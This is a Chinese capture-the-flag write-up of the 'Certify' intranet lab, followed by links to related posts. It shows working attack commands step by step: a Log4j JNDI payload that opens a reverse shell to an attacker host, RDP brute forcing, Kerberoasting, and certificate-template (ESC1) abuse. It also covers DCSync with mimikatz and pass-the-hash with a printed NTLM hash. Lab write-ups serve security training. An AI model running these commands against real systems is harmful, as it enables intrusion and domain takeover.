简介：

Certify是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag，分布于不同的靶机。

挑战开始：

flag01:

首先还是先扫描下端口

nmap -sC -sV -p 1-65535 47.92.120.224

扫描的太慢了，还是fscan先探测下

可以发现开放了3个端口
访问80端口
可以发现是个Nginx的默认页面

访问8983端口，发现是solr
solr常见的漏洞是任意文件读取和log4j，这里看到他存在log4j组件，所以先看看存不存在log4j

触发点是action参数

/solr/admin/collections?action=

尝试验证：

http://47.92.120.224:8983/solr/admin/collections?action=${jndi:ldap://iszpua.dnslog.cn}

成功收到请求

证明存在log4j漏洞
开始利用
首先先下载JNDIExploit
https://github.com/WhiteHSBG/JNDIExploit
接着在服务器上开启ldap服务

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 162.14.xxx.xxx

同时nc做好监听

接着发出请求

http://47.92.120.224:8983/solr/admin/collections?action=${jndi:ldap://162.14.xxx.xxx:1389/Basic/ReverseShell/162.14.xxx.xxx/1234}

这时候就会收到shell

这时候还需要提权
先sudo -l查看下
这里发现grc可以免密sudo执行

查询下提权

直接利用

成功提权
成功找到第一个flag

flag02:

攻击机先开启http服务，下载frp和fscan到solr服务器上

做好隧道，扫描下内网

./fscan -h 172.22.9.1/24 -pa 3389___                              _/ _ \     ___  ___ _ __ __ _  ___| | __/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.9.19     is alive
(icmp) Target 172.22.9.7      is alive
(icmp) Target 172.22.9.13     is alive
(icmp) Target 172.22.9.26     is alive
(icmp) Target 172.22.9.47     is alive
[*] Icmp alive hosts len is: 5
172.22.9.7:445 open
172.22.9.13:445 open
172.22.9.26:445 open
172.22.9.47:139 open
172.22.9.7:139 open
172.22.9.13:139 open
172.22.9.26:139 open
172.22.9.7:88 open
172.22.9.7:135 open
172.22.9.13:135 open
172.22.9.26:135 open
172.22.9.47:80 open
172.22.9.26:80 open
172.22.9.19:80 open
172.22.9.47:22 open
172.22.9.19:22 open
172.22.9.47:21 open
172.22.9.47:445 open
172.22.9.13:3389 open
172.22.9.7:3389 open
172.22.9.26:3389 open
172.22.9.19:8983 open
[*] alive ports len is: 22
start vulscan
[*] WebTitle: http://172.22.9.19        code:200 len:612    title:Welcome to nginx!
[*] NetBios: 172.22.9.7      [+]DC XIAORANG\XIAORANG-DC
[*] NetBios: 172.22.9.26     XIAORANG\DESKTOP-CBKTVMO
[*] NetInfo:
[*]172.22.9.26[->]DESKTOP-CBKTVMO[->]172.22.9.26
[*] NetBios: 172.22.9.13     XIAORANG\CA01
[*] NetInfo:
[*]172.22.9.13[->]CA01[->]172.22.9.13
[*] NetInfo:
[*]172.22.9.7[->]XIAORANG-DC[->]172.22.9.7
[*] WebTitle: http://172.22.9.47        code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.22.9.47     fileserver                          Windows 6.1
[*] 172.22.9.47  (Windows 6.1)
[*] WebTitle: http://172.22.9.26        code:200 len:703    title:IIS Windows Server

这里可以分析一下内网环境
172.22.9.7 DC域控
172.22.9.13 CA域成员机
172.22.9.19 solr服务器
172.22.9.26 域成员机
172.22.9.47 文件服务器

看了下其他几个web，都是一些默认界面，所以暂时先不看web
有三台机器开了445，这里面正好有文件服务器，所以先看下172.22.9.47这个机器

proxychains4 smbclient -L 172.22.9.47

可以发现成功连接

查看共享文件

proxychains4 smbclient //172.22.9.47/fileshare

成功找到第二个flag

flag03:

刚刚从数据库里面下载了几个文件，先看看db
member表

users表

这里有几个用户名被修改成*了
因为都是些个人的账号密码，尝试爆破3389
这里有三台机器开了3389，域控算了，CA服务器也算了，这里最有可能的是26这台机器，因为这机器名一看就像个人机器
这里先制作两个字典，用户名字典用member表里面的用户名，密码字典用user表里面的密码
尝试使用hydra爆破

proxychains4 hydra -L user.txt -P pass.txt 172.22.9.26 rdp

这里成功爆破出几个账号

zhangjian–i9XDE02pLVf
liupeng–fiAzGwEMgTY

尝试RDP,但是没有登陆成功

根据flag2里面的提示SPN
在内网中，SPN 扫描通过查询向域控服务器执行服务发现。这对于红队而言，可以帮助他们识别正在运行着重要服务的主机，如终端，交换机等。SPN 的识别与发现是 kerberoasting 攻击的第一步。
SPN 分为两种类型：
一种是注册在活动目录的机器帐户（Computers）下。当一个服务的权限为 Local System 或 Network Service 时，则 SPN 注册在机器帐户（Computers）下。另一种是注册在活动目录的域用户帐户（Users）下，当一个服务的权限为一个域用户时，则 SPN 注册在域用户帐户（Users）下。

这里先尝试查找下域用户下的spn
这里用到impacket

proxychains4 python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf

这里有个注意点，要把XIAORANG.LAB配置进hosts里面

把凭证保存在txt中，尝试hashcat破解
看了下hash类型，符合13100

hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force

成功跑出密码

这时候我们又多了一个凭证
zhangxia–MyPass2@@6
尝试RDP登陆
成功登陆26这台机器

但是权限不够无法访问其他用户文件夹
这时重新看看内网还有那些机器
172.22.9.13 CA域成员机
存在一台证书颁发服务器
域渗透中和证书服务器相关的利用有ESC1和ESC8
先检查有没证书配置错误
https://github.com/GhostPack/Certify

CertifyKit.exe find /vulnerable

C:\Users\zhangxia\Desktop>CertifyKit.exe find /vulnerable
CertifyKit (Hagrid29 version of Certify)
More info: https://github.com/Hagrid29/CertifyKit/[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=xiaorang,DC=lab'[*] Listing info about the Enterprise CA 'xiaorang-CA01-CA'Enterprise CA Name            : xiaorang-CA01-CADNS Hostname                  : CA01.xiaorang.labFullName                      : CA01.xiaorang.lab\xiaorang-CA01-CAFlags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCEDCert SubjectName              : CN=xiaorang-CA01-CA, DC=xiaorang, DC=labCert Thumbprint               : E50DC31FF6B0BA683078A2019BC11EA68D8EDE9FCert Serial                   : 63C71D005A6E478D440D21CFC707855ACert Start Date               : 2022/7/13 12:23:11Cert End Date                 : 2027/7/13 12:33:10Cert Chain                    : CN=xiaorang-CA01-CA,DC=xiaorang,DC=labUserSpecifiedSAN              : DisabledCA Permissions                :Owner: BUILTIN\Administrators        S-1-5-32-544Access Rights                                     PrincipalAllow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544Allow  ManageCA, ManageCertificates               XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512Allow  ManageCA, ManageCertificates               XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519Enrollment Agent Restrictions : None[!] Vulnerable Certificates Templates :CA Name                               : CA01.xiaorang.lab\xiaorang-CA01-CATemplate Name                         : XR ManagerSchema Version                        : 2Validity Period                       : 1 yearRenewal Period                        : 6 weeksmsPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECTmspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DSAuthorized Signatures Required        : 0pkiextendedkeyusage                   : 安全电子邮件, 加密文件系统, 客户端身份验证mspki-certificate-application-policy  : 安全电子邮件, 加密文件系统, 客户端身份验证PermissionsEnrollment PermissionsEnrollment Rights           : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500XIAORANG\chenchen             S-1-5-21-2318488573-3353402606-1029629362-1128XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512XIAORANG\Domain Computers     S-1-5-21-2318488573-3353402606-1029629362-515XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519XIAORANG\wangbin              S-1-5-21-2318488573-3353402606-1029629362-1171XIAORANG\zhangrui             S-1-5-21-2318488573-3353402606-1029629362-1157XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186AutoEnrollment Rights       : XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186Object Control PermissionsOwner                       : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500WriteOwner Principals       : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186WriteDacl Principals        : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186WriteProperty Principals    : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186CA Name                               : CA01.xiaorang.lab\xiaorang-CA01-CATemplate Name                         : XR MachineSchema Version                        : 2Validity Period                       : 1 yearRenewal Period                        : 6 weeksmsPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECTmspki-enrollment-flag                 : NONEAuthorized Signatures Required        : 0pkiextendedkeyusage                   : 服务器身份验证, 客户端身份验证mspki-certificate-application-policy  : 服务器身份验证, 客户端身份验证PermissionsEnrollment PermissionsEnrollment Rights           : XIAORANG\chenchen             S-1-5-21-2318488573-3353402606-1029629362-1128XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512XIAORANG\Domain Computers     S-1-5-21-2318488573-3353402606-1029629362-515XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186AutoEnrollment Rights       : XIAORANG\chenchen             S-1-5-21-2318488573-3353402606-1029629362-1128Object Control PermissionsOwner                       : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500WriteOwner Principals       : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519WriteDacl Principals        : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519WriteProperty Principals    : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519

这里要成功利用要满足三个点
1、我们需要有权限去获取证书
2、能够登记为客户端身份验证或智能卡登录等
3、CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT开启
这里可以发现三点都满足

接着我们开始为域管申请证书

CertifyKit.exe request /ca:CA01.xiaorang.lab\xiaorang-CA01-CA /template:"XR Manager" /altname:XIAORANG.LAB\Administrator

然后换算pem到pfx，不要输入密码

接着请求票据

Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password: /ptt

接着DCsync

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" "exit" > 1.txt

成功获取域管hash

最后直接Crackmapexec哈希传递

proxychains4 python3 crackmapexec.py smb 172.22.9.26 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

flag04:

使用wmiexec成功获取第四个flag

proxychains python3 wmiexec.py -hashes 00000000000000000000000000000000:2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7

靶场练习--春秋云境-Certify相关推荐

春秋云境系列靶场记录（合集）-不再更新
春秋云境系列靶场记录春秋云境系列靶场记录合集,不更新了哈~~~ 2023/1/17日记感谢各位朋友的关注,2022年11月到12月,利用空闲时间做了春秋云镜的靶场,因为穷,所以也只能做免费的(当然 ...
春秋云境：CVE-2022-25411
春秋云境:CVE-2022-25411 文章合集:春秋云境系列靶场记录(合集) Maxsite CMS文件上传漏洞:CVE-2022-25411 漏洞介绍 MaxSite CMS是俄国MaxSite ...
【春秋云境.com】全新靶标Exchange惊喜上线，带你领略实战新体验
当今网络安全形势日趋严峻,网络安全的问题复杂而突出,这对网络安全人才的实战能力提出了更高的要求.然而,国内很多靶场环境设计均无法满足从业人员对实战渗透能力提升的需求. 于是,春秋云境.com应运而生! ...
【春秋云境.com】每月10号1024会员日，双倍体验惊喜不停
在计算机语言中,1024是个一个很神奇而又美妙的数字,1024Byte(字节)=1KB,1024 KB=1MB,1024 MB=1GB,象征着数字世界中无数微光集聚,照亮了网络世界前进的方向! 202 ...
【春秋云境】CVE-2015-1427靶场wp
elasticsearch 代码执行 (CVE-2015-1427) 一.漏洞简介 CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍 ...
【春秋云境】 CVE-2022-24663复现
靶标介绍: 远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有"短代码"参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码.P.S. 存在常见用户 ...
【原创】Ichunqiu云境 —— Endless(无间计划) Writeup
Ichunqiu云境 -- Endless(无间计划) Writeup Author:小离-xiaoli 0x00 Intro 前言: 两个入口点,一个入口点是pboot-cms,另外一个是SQL注入 ...
名流云服务器网站,祥生云境示范区盛大启幕敬邀全城名流
艺术来源于生活,却又高于生活,艺术究竟在生活中扮演着怎样的角色? 毕加索说:艺术是使我们抵达真实的遐想. 王尔德说:生活的奥秘,隐藏于艺术之中. 5月18日,祥生·云境示范区暨『CLOUD·时代艺术美 ...
Ichunqiu云境 —— Exchange Writeup
Ichunqiu云境 -- Exchange Writeup Author:小离-xiaoli 0x00 Intro OSCP 渗透风格,脱离C2和MSF之类的工具 Box 难度不高 0x01 Inf ...

靶场练习--春秋云境-Certify

简介：